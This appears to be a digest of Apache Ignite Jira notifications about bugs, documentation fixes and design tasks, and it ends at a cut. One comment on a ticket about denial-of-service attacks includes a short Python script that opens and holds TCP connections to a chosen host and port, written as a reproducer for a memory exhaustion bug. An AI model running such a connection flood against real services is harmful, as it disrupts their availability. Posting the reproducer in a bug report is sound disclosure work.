[jira] [Updated] (IGNITE-16843) Timeout during thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Labels: ducktests thin  (was: )

> Timeout during thin client connection
> 
>
> Key: IGNITE-16843
> URL: https://issues.apache.org/jira/browse/IGNITE-16843
> Project: Ignite
>  Issue Type: Bug
>Reporter: Sergey Korotkov
>Priority: Minor
>  Labels: ducktests, thin
> Attachments: test_one_greedy_thin_client.png
>
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> In use cases with several active thin clients producing noticeable load on 
> the cluster, new thin clients can fail to connect with the 
> *"ClientConnectionException: Channel is closed"* error in the 
> *TcpClientChannel::handshake()* method.
> On the server side the warning *"Unable to perform handshake within timeout 
> [timeout=1"* is logged.
> The problem can be easily reproduced by several large putAlls invoked in 
> parallel from several thin clients or a single one, especially for 
> TRANSACTIONAL caches. ATOMIC caches are also affected; the only difference 
> is that for ATOMIC caches a higher parallelism factor and larger putAll 
> batches are needed.
> 
> The reason for the problem is that a single queue is used in the Ignite 
> node to serve all thin-client-related requests (the queue in the 
> {_}GridThinClientExecutor{_}): both working requests like _putAll_ and 
> control ones like _handshake_, which are used for connection establishment. 
> Working requests can live indefinitely in the queue (or at least longer than 
> a {_}handshake{_}).  On the other hand, a special watchdog timer is scheduled 
> in the Ignite node to check whether a _handshake_ request is processed in a 
> timely manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}).  By 
> default a 10-second timeout is used 
> ({_}ClientConnectorConfiguration::handshakeTimeout{_}). If the timeout 
> expires, the client session is closed forcibly.
> So, if one or several thin clients fill the queue with long operations, new 
> clients cannot connect.
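> As an illustrative workaround sketch (not a fix), the queue pressure can be 
> eased on the server side by enlarging the client connector thread pool and the 
> handshake timeout; the setter names below are assumed to match the 
> configuration properties mentioned above:
> {noformat}
> IgniteConfiguration cfg = new IgniteConfiguration();
> 
> // Assumed fluent setters for the ClientConnectorConfiguration properties.
> ClientConnectorConfiguration cliConnCfg = new ClientConnectorConfiguration()
>     .setThreadPoolSize(32)        // default is 8; more workers drain the queue faster
>     .setHandshakeTimeout(30_000); // default is 10_000 ms
> 
> cfg.setClientConnectorConfiguration(cliConnCfg);
> {noformat}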
> 
> The real use case that revealed the problem is as follows:
>  * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
>  * One TRANSACTIONAL cache with backups=1
>  * About 30 GB of data on each node
>  * Several (up to 75 at the same time) thin clients loading data using putAlls 
> in 5-record batches. A client connects, loads 3 batches and disconnects 
> (Spark jobs, in fact). In other words, clients connect and disconnect 
> constantly.
>  * Default handshakeTimeout (10 secs) and threadPoolSize (8) in 
> ClientConnectorConfiguration
> 
> Two ducktests were created to reproduce and isolate the problem (see 
> {*}ignitetest/tests/thin_client_concurrency{*} in the attached pull request).
> *{color:#ff}Note that the asserts in the test cases are written so that a test 
> PASS means the problem IS reproduced.{color}*  The tests check that at least 
> one thin client fails with the "Channel is closed" error and that the server 
> node log contains the warning about the handshake timeout.
> *ThinClientConcurrencyTest::test_many_thin_clients*
> Mimics the real-life use case above. Several thin client processes invoke 
> putAlls in several threads. There are two sets of parameters: one for a 
> TRANSACTIONAL and one for an ATOMIC cache.
> *ThinClientConcurrencyTest::test_one_greedy_thin_client*
> A minimal test showing that a single thin client can produce such a load that 
> another one cannot connect.
> The attached metrics screenshot shows the behaviour of the test in detail:
> 1. The first thin client is invoked and starts loading data with putAlls in 
> several threads.
> 2. The second thin client is invoked once the queue is filled.
> 3. After 10 seconds the session of the second client is closed.
> 4. The executor takes the handshake request from the queue and (erroneously?) 
> increases the _client_connector_AcceptedSessions_ metric (note that 
> _ActiveSessions_ wasn't increased).
> [^test_one_greedy_thin_client.png]
>  
> 
> The following full stack trace is logged on the client side:
> {noformat}
> org.apache.ignite.client.ClientConnectionException: Channel is closed
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
>  ~[classes/:?]
> at 
> org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
>  ~[classes/:?]
> at 
> 

[jira] [Commented] (IGNITE-16741) DoS attacks on ignite ports

2022-04-13 Thread biandeqiang (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16741?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17522016#comment-17522016
 ] 

biandeqiang commented on IGNITE-16741:
--

import sys

import socket

import time  # used only if the throttling sleep below is enabled

# Sockets are kept in a global list so they stay open for the whole run.
socks = []

def connect_attack(ip, port):
    # Open TCP connections to the target port without ever sending data.
    for i in range(8):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect((ip, port))
        socks.append(sock)

        if i % 500 == 0:
            print(i)  # progress indicator for large connection counts
            # time.sleep(1)

def main():
    try:
        ip = sys.argv[1]
        port = int(sys.argv[2])
    except IndexError:
        print("Please add two parameters as IP and port")
        return

    connect_attack(ip, port)

if __name__ == "__main__":
    main()

> DoS attacks on ignite ports
> ---
>
> Key: IGNITE-16741
> URL: https://issues.apache.org/jira/browse/IGNITE-16741
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.11.1
>Reporter: biandeqiang
>Assignee: Aleksandr Polovtcev
>Priority: Critical
>  Labels: ise
>
> DoS attacks on Ignite's TcpCommunicationSpi and TcpDiscoverySpi ports.
> The Ignite I use is embedded; Ignite uses two ports. When I was testing a DoS 
> attack on the ports, Ignite hit java.lang.OutOfMemoryError: Direct buffer 
> memory.
> TcpDiscoverySpi spi = new TcpDiscoverySpi();
> spi.setLocalPort(port); // port is an int
> TcpCommunicationSpi ipCom = new TcpCommunicationSpi();
> ipCom.setLocalPort(port);
>  
> {{[2021-12-01 14:12:59,056][WARN 
> ][0][0][grid-nio-worker-tcp-comm-4-#43%TcpCommunicationSpi%][ROOT][IgniteLoggerImp][88]
>  Caught unhandled exception in NIO worker thread (restart the node). 
> java.lang.OutOfMemoryError: Direct buffer memory
> at java.nio.Bits.reserveMemory(Bits.java:695)
> at java.nio.DirectByteBuffer.(DirectByteBuffer.java:123)
> at java.nio.ByteBuffer.allocateDirect(ByteBuffer.java:311)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.register(GridNioServer.java:2672)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.bodyInternal(GridNioServer.java:2089)
> at 
> org.apache.ignite.internal.util.nio.GridNioServer$AbstractNioClientWorker.body(GridNioServer.java:1910)
> at org.apache.ignite.internal.util.worker.GridWorker.run(GridWorker.java:120)
> at java.lang.Thread.run(Thread.java:748)}}
>  
> I hope Ignite can also add a MaxConnect limit, as Tomcat does, and a counter: 
> if the counter exceeds the limit, wait several seconds before accepting new 
> connections.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-16840) Error creating bean SqlViewMetricExporterSpi while setting bean property 'metricExporterSpi' according to documentation

2022-04-13 Thread YuJue Li (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16840?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521978#comment-17521978
 ] 

YuJue Li commented on IGNITE-16840:
---

[~igor_zadubinin] The documentation has been fixed; it is recommended to close 
this issue.

> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according to documentation
> 
>
> Key: IGNITE-16840
> URL: https://issues.apache.org/jira/browse/IGNITE-16840
> Project: Ignite
>  Issue Type: Bug
>Affects Versions: 2.12
>Reporter: Igor Zadubinin
>Assignee: Igor Zadubinin
>Priority: Major
>
> Error creating bean SqlViewMetricExporterSpi while setting bean property 
> 'metricExporterSpi' according to the documentation 
> [https://ignite.apache.org/docs/latest/monitoring-metrics/new-metrics-system]
>  
> Error creating bean with name 'ignite.cfg' defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml]:
>  Cannot create inner bean 
> 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' of type 
> [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] while setting 
> bean property 'metricExporterSpi' with key [0]; nested exception is 
> org.springframework.beans.factory.CannotLoadBeanClassException: Cannot find 
> class [org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi] for bean 
> with name 'org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi#2df9b86' 
> defined in URL 
> [file:/Users/a19759135/Ignite/distrib/apache-ignite-2.12.0-bin/bin/../config/serverExampleConfig.xml];
>  nested exception is java.lang.ClassNotFoundException: 
> org.apache.ignite.spi.metric.sql.SqlViewMetricExporterSpi



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-15712) Documentation: Invalid documentation about SqlViewMetricExporterSpi

2022-04-13 Thread YuJue Li (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-15712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

YuJue Li updated IGNITE-15712:
--
Ignite Flags:   (was: Docs Required,Release Notes Required)

> Documentation: Invalid documentation about SqlViewMetricExporterSpi
> ---
>
> Key: IGNITE-15712
> URL: https://issues.apache.org/jira/browse/IGNITE-15712
> Project: Ignite
>  Issue Type: Task
>  Components: documentation
>Affects Versions: 2.10, 2.11
>Reporter: Ivan Daschinsky
>Assignee: YuJue Li
>Priority: Major
> Fix For: 2.13
>
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> Since SqlViewMetricExporterSpi was moved to an internal package and is enabled 
> by default (see IGNITE-12922), the documentation should be updated.
> However, it currently contains wrong recipes about how to configure 
> SqlMetricsExporter.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Resolved] (IGNITE-15712) Documentation: Invalid documentation about SqlViewMetricExporterSpi

2022-04-13 Thread YuJue Li (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-15712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

YuJue Li resolved IGNITE-15712.
---
Resolution: Fixed

> Documentation: Invalid documentation about SqlViewMetricExporterSpi
> ---
>
> Key: IGNITE-15712
> URL: https://issues.apache.org/jira/browse/IGNITE-15712
> Project: Ignite
>  Issue Type: Task
>  Components: documentation
>Affects Versions: 2.10, 2.11
>Reporter: Ivan Daschinsky
>Assignee: YuJue Li
>Priority: Major
> Fix For: 2.13
>
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> Since SqlViewMetricExporterSpi was moved to an internal package and is enabled 
> by default (see IGNITE-12922), the documentation should be updated.
> However, it currently contains wrong recipes about how to configure 
> SqlMetricsExporter.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-11650) Communication worker doesn't kick client node after expired idleConnTimeout

2022-04-13 Thread Amelchev Nikita (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-11650?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Amelchev Nikita reassigned IGNITE-11650:


Assignee: Amelchev Nikita

> Communication worker doesn't kick client node after expired idleConnTimeout
> ---
>
> Key: IGNITE-11650
> URL: https://issues.apache.org/jira/browse/IGNITE-11650
> Project: Ignite
>  Issue Type: Bug
>Reporter: Anton Kalashnikov
>Assignee: Amelchev Nikita
>Priority: Major
>  Time Spent: 20m
>  Remaining Estimate: 0h
>
> Reproduced by TcpCommunicationSpiFreezingClientTest.testFreezingClient
> {noformat}
> java.lang.AssertionError: Client node must be kicked from topology
>   at org.junit.Assert.fail(Assert.java:88)
>   at 
> org.apache.ignite.testframework.junits.JUnitAssertAware.fail(JUnitAssertAware.java:49)
>   at 
> org.apache.ignite.spi.communication.tcp.TcpCommunicationSpiFreezingClientTest.testFreezingClient(TcpCommunicationSpiFreezingClientTest.java:122)
>   at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
>   at 
> sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
>   at 
> sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
>   at java.lang.reflect.Method.invoke(Method.java:498)
>   at 
> org.junit.runners.model.FrameworkMethod$1.runReflectiveCall(FrameworkMethod.java:47)
>   at 
> org.junit.internal.runners.model.ReflectiveCallable.run(ReflectiveCallable.java:12)
>   at 
> org.junit.runners.model.FrameworkMethod.invokeExplosively(FrameworkMethod.java:44)
>   at 
> org.junit.internal.runners.statements.InvokeMethod.evaluate(InvokeMethod.java:17)
>   at 
> org.junit.internal.runners.statements.RunBefores.evaluate(RunBefores.java:26)
>   at 
> org.junit.internal.runners.statements.RunAfters.evaluate(RunAfters.java:27)
>   at 
> org.apache.ignite.testframework.junits.GridAbstractTest$6.run(GridAbstractTest.java:2102)
> {noformat}



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Commented] (IGNITE-16823) .NET: Thin 3.0: Compute cluster awareness

2022-04-13 Thread Igor Sapego (Jira)


[ 
https://issues.apache.org/jira/browse/IGNITE-16823?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17521791#comment-17521791
 ] 

Igor Sapego commented on IGNITE-16823:
--

[~ptupitsyn] looks good to me

> .NET: Thin 3.0: Compute cluster awareness
> -
>
> Key: IGNITE-16823
> URL: https://issues.apache.org/jira/browse/IGNITE-16823
> Project: Ignite
>  Issue Type: Improvement
>  Components: platforms, thin client
>Affects Versions: 3.0.0-alpha5
>Reporter: Pavel Tupitsyn
>Assignee: Pavel Tupitsyn
>Priority: Major
>  Labels: ignite-3
> Fix For: 3.0.0-alpha5
>
>
> Currently, all Compute operations go through the default node. Improve client 
> compute with cluster awareness:
> * Associate client connections with node IDs (extend the handshake).
> * *Compute.Execute*: match the specified set of nodes against active 
> connections. If there are matches, pick a random one. Otherwise, use the 
> default connection and let the server handle node mapping (see the sketch below).
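> As an illustrative sketch only (hypothetical names, written in Java rather 
> than .NET), the selection rule could look like:
> {noformat}
> import java.util.*;
> import java.util.concurrent.ThreadLocalRandom;
> 
> class ComputeRouting {
>     /** Stand-in for the client's per-node connection type (hypothetical). */
>     interface Connection {}
> 
>     /** Prefer a connection to one of the target nodes; else fall back to default. */
>     static Connection pickConnection(Set<String> targetNodeIds,
>         Map<String, Connection> connectionsByNodeId, Connection defaultConnection) {
>         List<Connection> matches = new ArrayList<>();
> 
>         for (String nodeId : targetNodeIds) {
>             Connection conn = connectionsByNodeId.get(nodeId);
> 
>             if (conn != null)
>                 matches.add(conn);
>         }
> 
>         if (matches.isEmpty())
>             return defaultConnection; // let the server handle node mapping
> 
>         return matches.get(ThreadLocalRandom.current().nextInt(matches.size()));
>     }
> }
> {noformat}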



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Assigned] (IGNITE-16848) [Versioned Storage] Provide common interface for abstract internal tuples

2022-04-13 Thread Ivan Bessonov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16848?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ivan Bessonov reassigned IGNITE-16848:
--

Assignee: Ivan Bessonov

> [Versioned Storage] Provide common interface for abstract internal tuples
> -
>
> Key: IGNITE-16848
> URL: https://issues.apache.org/jira/browse/IGNITE-16848
> Project: Ignite
>  Issue Type: Improvement
>Reporter: Ivan Bessonov
>Assignee: Ivan Bessonov
>Priority: Major
>  Labels: iep-74, ignite-3
> Fix For: 3.0.0-alpha5
>
>  Time Spent: 10m
>  Remaining Estimate: 0h
>
> Methods from the "Row" class should be extracted to provide a generic tuple API 
> to components like SQL indexes or the MV storage.
> A tuple is NOT schema-aware and should NOT have methods like "Object value(int 
> col)", because it represents a basic blob with little to no meta information.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16848) [Versioned Storage] Provide common interface for abstract internal tuples

2022-04-13 Thread Ivan Bessonov (Jira)
Ivan Bessonov created IGNITE-16848:
--

 Summary: [Versioned Storage] Provide common interface for abstract 
internal tuples
 Key: IGNITE-16848
 URL: https://issues.apache.org/jira/browse/IGNITE-16848
 Project: Ignite
  Issue Type: Improvement
Reporter: Ivan Bessonov
 Fix For: 3.0.0-alpha5


Methods from the "Row" class should be extracted to provide a generic tuple API 
to components like SQL indexes or the MV storage.

A tuple is NOT schema-aware and should NOT have methods like "Object value(int 
col)", because it represents a basic blob with little to no meta information.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16611) [Versioned Storage] Version chain data structure for RocksDB-based storage

2022-04-13 Thread Ivan Bessonov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16611?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Ivan Bessonov updated IGNITE-16611:
---
Labels: iep-74 ignite-3  (was: ignite-3)

> [Versioned Storage]  Version chain data structure for RocksDB-based storage
> ---
>
> Key: IGNITE-16611
> URL: https://issues.apache.org/jira/browse/IGNITE-16611
> Project: Ignite
>  Issue Type: Task
>  Components: persistence
>Reporter: Sergey Chugunov
>Assignee: Ivan Bessonov
>Priority: Major
>  Labels: iep-74, ignite-3
>
> To support concurrency control and implement efficient transactions, the 
> capability to store multiple values for the same key is needed in the 
> existing storage.
> h3. Version chain
> The key component here is a special data structure called the version chain: 
> it is a list of all versions of a particular key, with the most recent version 
> at the beginning (HEAD).
> Each entry in the chain contains the value, a reference to the next entry in 
> the list, begin and end timestamps, and the id of the active transaction that 
> created this version.
> There are at least two approaches to implementing this structure on top of 
> RocksDB:
> * Combine the original key and the version into a new key which is put into a 
> RocksDB tree. In that case, to restore the version chain we need to iterate 
> over the tree using the original key as a prefix (see the encoding sketch 
> after the lists below).
> * Use the original key as-is but make it point not to the value directly but 
> to an array containing the version and other meta information (timestamps, 
> transaction id, etc.) and keys in some secondary tree.
> h3. New API to manage versions
> The following new API should be implemented to provide access to the version 
> chain:
> * Methods to manipulate versions: add a new version to the chain, commit an 
> uncommitted version, abort an uncommitted version.
> * A method to clean up old versions from the chain.
> * A method to scan over keys up to a provided timestamp.
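> For illustration, a minimal sketch of the first approach (hypothetical 
> encoding, not the actual implementation): the composite RocksDB key is the 
> original key followed by the bitwise-inverted version timestamp, so an 
> ascending prefix scan over the original key returns versions newest-first.
> {noformat}
> import java.nio.ByteBuffer;
> 
> class VersionChainKeys {
>     // Hypothetical composite-key encoding: [originalKey][~timestamp].
>     // Inverting the timestamp makes RocksDB's ascending unsigned byte order
>     // return the newest version first during a prefix scan over originalKey.
>     static byte[] versionedKey(byte[] originalKey, long timestamp) {
>         ByteBuffer buf = ByteBuffer.allocate(originalKey.length + Long.BYTES);
> 
>         buf.put(originalKey);
>         buf.putLong(~timestamp); // bitwise inversion reverses the sort order
> 
>         return buf.array();
>     }
> }
> {noformat}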



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16847) [Extensions] Use apache-release profile for extension release

2022-04-13 Thread Maxim Muzafarov (Jira)
Maxim Muzafarov created IGNITE-16847:


 Summary: [Extensions] Use apache-release profile for extension 
release
 Key: IGNITE-16847
 URL: https://issues.apache.org/jira/browse/IGNITE-16847
 Project: Ignite
  Issue Type: Task
  Components: extensions
Reporter: Maxim Muzafarov
Assignee: Maxim Muzafarov
 Fix For: 2.14


The goal is to prepare everything for an extension release:
- sources
- binary packages (if applicable)
- PGP signatures
- checksums

In addition, some scripts are required to follow the ASF release process.
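A sketch of the intended invocation, assuming the extensions inherit the 
standard Apache parent pom that defines the apache-release profile:
{noformat}
# Builds the source release archive, signs artifacts with PGP and generates
# checksums via the standard ASF apache-release profile.
mvn clean install -Papache-release -DskipTests
{noformat}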



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16847) [Extensions] Use apache-release profile for extension release

2022-04-13 Thread Maxim Muzafarov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16847?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Maxim Muzafarov updated IGNITE-16847:
-
Ignite Flags:   (was: Docs Required,Release Notes Required)

> [Extensions] Use apache-release profile for extension release
> -
>
> Key: IGNITE-16847
> URL: https://issues.apache.org/jira/browse/IGNITE-16847
> Project: Ignite
>  Issue Type: Task
>  Components: extensions
>Reporter: Maxim Muzafarov
>Assignee: Maxim Muzafarov
>Priority: Major
> Fix For: 2.14
>
>
> The goal is to prepare everything for an extension release:
> - sources
> - binary packages (if applicable)
> - PGP signatures
> - checksums
> In addition, some scripts are required to follow the ASF release process.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16815) [Extensions] Ignite extensions must use ignite-parent as a parent project

2022-04-13 Thread Maxim Muzafarov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16815?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Maxim Muzafarov updated IGNITE-16815:
-
Ignite Flags:   (was: Docs Required,Release Notes Required)

> [Extensions] Ignite extensions must use ignite-parent as a parent project
> -
>
> Key: IGNITE-16815
> URL: https://issues.apache.org/jira/browse/IGNITE-16815
> Project: Ignite
>  Issue Type: Improvement
>  Components: extensions
>Reporter: Maxim Muzafarov
>Assignee: Maxim Muzafarov
>Priority: Major
> Fix For: 2.14
>
>
> Ignite Extensions currently use their own maven parent project, which leads to 
> duplicated configuration of maven profiles, dependency versions and the build 
> lifecycle. Since the ignite-parent pom is now available, it's better to use 
> the shared pom as the single parent for all extensions.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout during thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
cluster, new thin clients can fail to connect with the 
*"ClientConnectionException: Channel is closed"* error in the 
*TcpClientChannel::handshake()* method.

On the server side the warning *"Unable to perform handshake within timeout 
[timeout=1"* is logged.

The problem can be easily reproduced by several large putAlls invoked in 
parallel from several thin clients or a single one, especially for TRANSACTIONAL 
caches. ATOMIC caches are also affected; the only difference is that for ATOMIC 
caches a higher parallelism factor and larger putAll batches are needed.

The reason for the problem is that a single queue is used in the Ignite node to 
serve all thin-client-related requests (the queue in the 
{_}GridThinClientExecutor{_}): both working requests like _putAll_ and control 
ones like _handshake_, which are used for connection establishment.

Working requests can live indefinitely in the queue (or at least longer than a 
{_}handshake{_}). On the other hand, a special watchdog timer is scheduled in 
the Ignite node to check whether a _handshake_ request is processed in a timely 
manner ({_}ClientListenerNioListener::scheduleHandshakeTimeout{_}). By default a 
10-second timeout is used ({_}ClientConnectorConfiguration::handshakeTimeout{_}). 
If the timeout expires, the client session is closed forcibly.

So, if one or several thin clients fill the queue with long operations, new 
clients cannot connect.

The real use case that revealed the problem is as follows (a reproduction sketch 
follows the list):
 * 4-node cluster, 64 CPUs, 32 GB heap, 512 GB off-heap each
 * One TRANSACTIONAL cache with backups=1
 * About 30 GB of data on each node
 * Several (up to 75 at the same time) thin clients loading data using putAlls 
in 5-record batches. A client connects, loads 3 batches and disconnects 
(Spark jobs, in fact). In other words, clients connect and disconnect constantly.
 * Default handshakeTimeout (10 secs) and threadPoolSize (8) in 
ClientConnectorConfiguration
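For a client-side reproduction sketch (hypothetical cache name and sizes), one 
client floods the shared queue with large putAlls from several threads while a 
second client tries to connect:
{noformat}
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.ThreadLocalRandom;

import org.apache.ignite.Ignition;
import org.apache.ignite.client.ClientCache;
import org.apache.ignite.client.IgniteClient;
import org.apache.ignite.configuration.ClientConfiguration;

public class GreedyThinClientRepro {
    public static void main(String[] args) {
        ClientConfiguration cc = new ClientConfiguration().setAddresses("127.0.0.1:10800");

        try (IgniteClient loader = Ignition.startClient(cc)) {
            ClientCache<Integer, byte[]> cache = loader.getOrCreateCache("tx-cache");

            ExecutorService pool = Executors.newFixedThreadPool(16);

            // Flood the server-side thin client queue with long-running putAlls.
            for (int t = 0; t < 16; t++) {
                pool.submit(() -> {
                    Map<Integer, byte[]> batch = new HashMap<>();

                    for (int i = 0; i < 10_000; i++)
                        batch.put(ThreadLocalRandom.current().nextInt(), new byte[1024]);

                    cache.putAll(batch);
                });
            }

            // While the queue is busy, a new client's handshake waits behind the
            // putAlls and is killed by the watchdog after handshakeTimeout.
            Ignition.startClient(cc); // expected: ClientConnectionException: Channel is closed
        }
    }
}
{noformat}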


Two ducktests were created to reproduce and isolate the problem (see 
{*}ignitetest/tests/thin_client_concurrency{*} in the attached pull request).

*{color:#ff}Note that the asserts in the test cases are written so that a test 
PASS means the problem IS reproduced.{color}*  The tests check that at least one 
thin client fails with the "Channel is closed" error and that the server node 
log contains the warning about the handshake timeout.

*ThinClientConcurrencyTest::test_many_thin_clients*

Mimics the real-life use case above. Several thin client processes invoke 
putAlls in several threads. There are two sets of parameters: one for a 
TRANSACTIONAL and one for an ATOMIC cache.

*ThinClientConcurrencyTest::test_one_greedy_thin_client*

A minimal test showing that a single thin client can produce such a load that 
another one cannot connect.

The attached metrics screenshot shows the behaviour of the test in detail:

1. The first thin client is invoked and starts loading data with putAlls in 
several threads.
2. The second thin client is invoked once the queue is filled.
3. After 10 seconds the session of the second client is closed.
4. The executor takes the handshake request from the queue and (erroneously?) 
increases the _client_connector_AcceptedSessions_ metric (note that 
_ActiveSessions_ wasn't increased).

[^test_one_greedy_thin_client.png]

 

The following full stack trace is logged on the client side:
{noformat}
org.apache.ignite.client.ClientConnectionException: Channel is closed
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.handshake(TcpClientChannel.java:595)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpClientChannel.(TcpClientChannel.java:180)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:917)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.getOrCreateChannel(ReliableChannel.java:898)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel$ClientChannelHolder.access$200(ReliableChannel.java:847)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:759)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.applyOnDefaultChannel(ReliableChannel.java:731)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.ReliableChannel.channelsInit(ReliableChannel.java:702)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:126)
 ~[classes/:?]
at 
org.apache.ignite.internal.client.thin.TcpIgniteClient.(TcpIgniteClient.java:102)
 ~[classes/:?]
at 

[jira] [Assigned] (IGNITE-15712) Documentation: Invalid documentation about SqlViewMetricExporterSpi

2022-04-13 Thread YuJue Li (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-15712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

YuJue Li reassigned IGNITE-15712:
-

Assignee: YuJue Li

> Documentation: Invalid documentation about SqlViewMetricExporterSpi
> ---
>
> Key: IGNITE-15712
> URL: https://issues.apache.org/jira/browse/IGNITE-15712
> Project: Ignite
>  Issue Type: Task
>  Components: documentation
>Affects Versions: 2.10, 2.11
>Reporter: Ivan Daschinsky
>Assignee: YuJue Li
>Priority: Major
> Fix For: 2.13
>
>
> Since SqlViewMetricExporterSpi was moved to an internal package and is enabled 
> by default (see IGNITE-12922), the documentation should be updated.
> However, it currently contains wrong recipes about how to configure 
> SqlMetricsExporter.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Created] (IGNITE-16846) Internal API modules cleanup

2022-04-13 Thread Sergey Chugunov (Jira)
Sergey Chugunov created IGNITE-16846:


 Summary: Internal API modules cleanup
 Key: IGNITE-16846
 URL: https://issues.apache.org/jira/browse/IGNITE-16846
 Project: Ignite
  Issue Type: Task
  Components: networking
Reporter: Sergey Chugunov


Two modules containing internal APIs need refactoring and cleanup:
 * the *network-api* module contains classes and interfaces placed in public 
packages (without an *internal* package in their full paths) that shouldn't be 
exposed to the end user;
 * the *configuration-api* module contains a mix of classes, interfaces and 
annotations, some of which are clearly internal and some of which are used in 
the ignite-api module, which is definitely public.

We should address this in the following way:
 * in the *network-api* module it is enough to rename packages and add an 
*internal* package to the full path;
 * in the *configuration-api* module we need to move code around: as we don't 
have an embedded mode for server nodes, users won't interact with the Java 
configuration directly. Thus configuration schema classes can be moved from the 
*ignite-api* module to the modules where these configuration classes belong. 
After that we can add an *internal* package to the full path of all classes in 
the *configuration-api* module as well.



--
This message was sent by Atlassian Jira
(v8.20.1#820001)


[jira] [Updated] (IGNITE-16843) Timeout during thin client connection

2022-04-13 Thread Sergey Korotkov (Jira)


 [ 
https://issues.apache.org/jira/browse/IGNITE-16843?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Sergey Korotkov updated IGNITE-16843:
-
Description: 
In use cases with several active thin clients producing noticeable load on the 
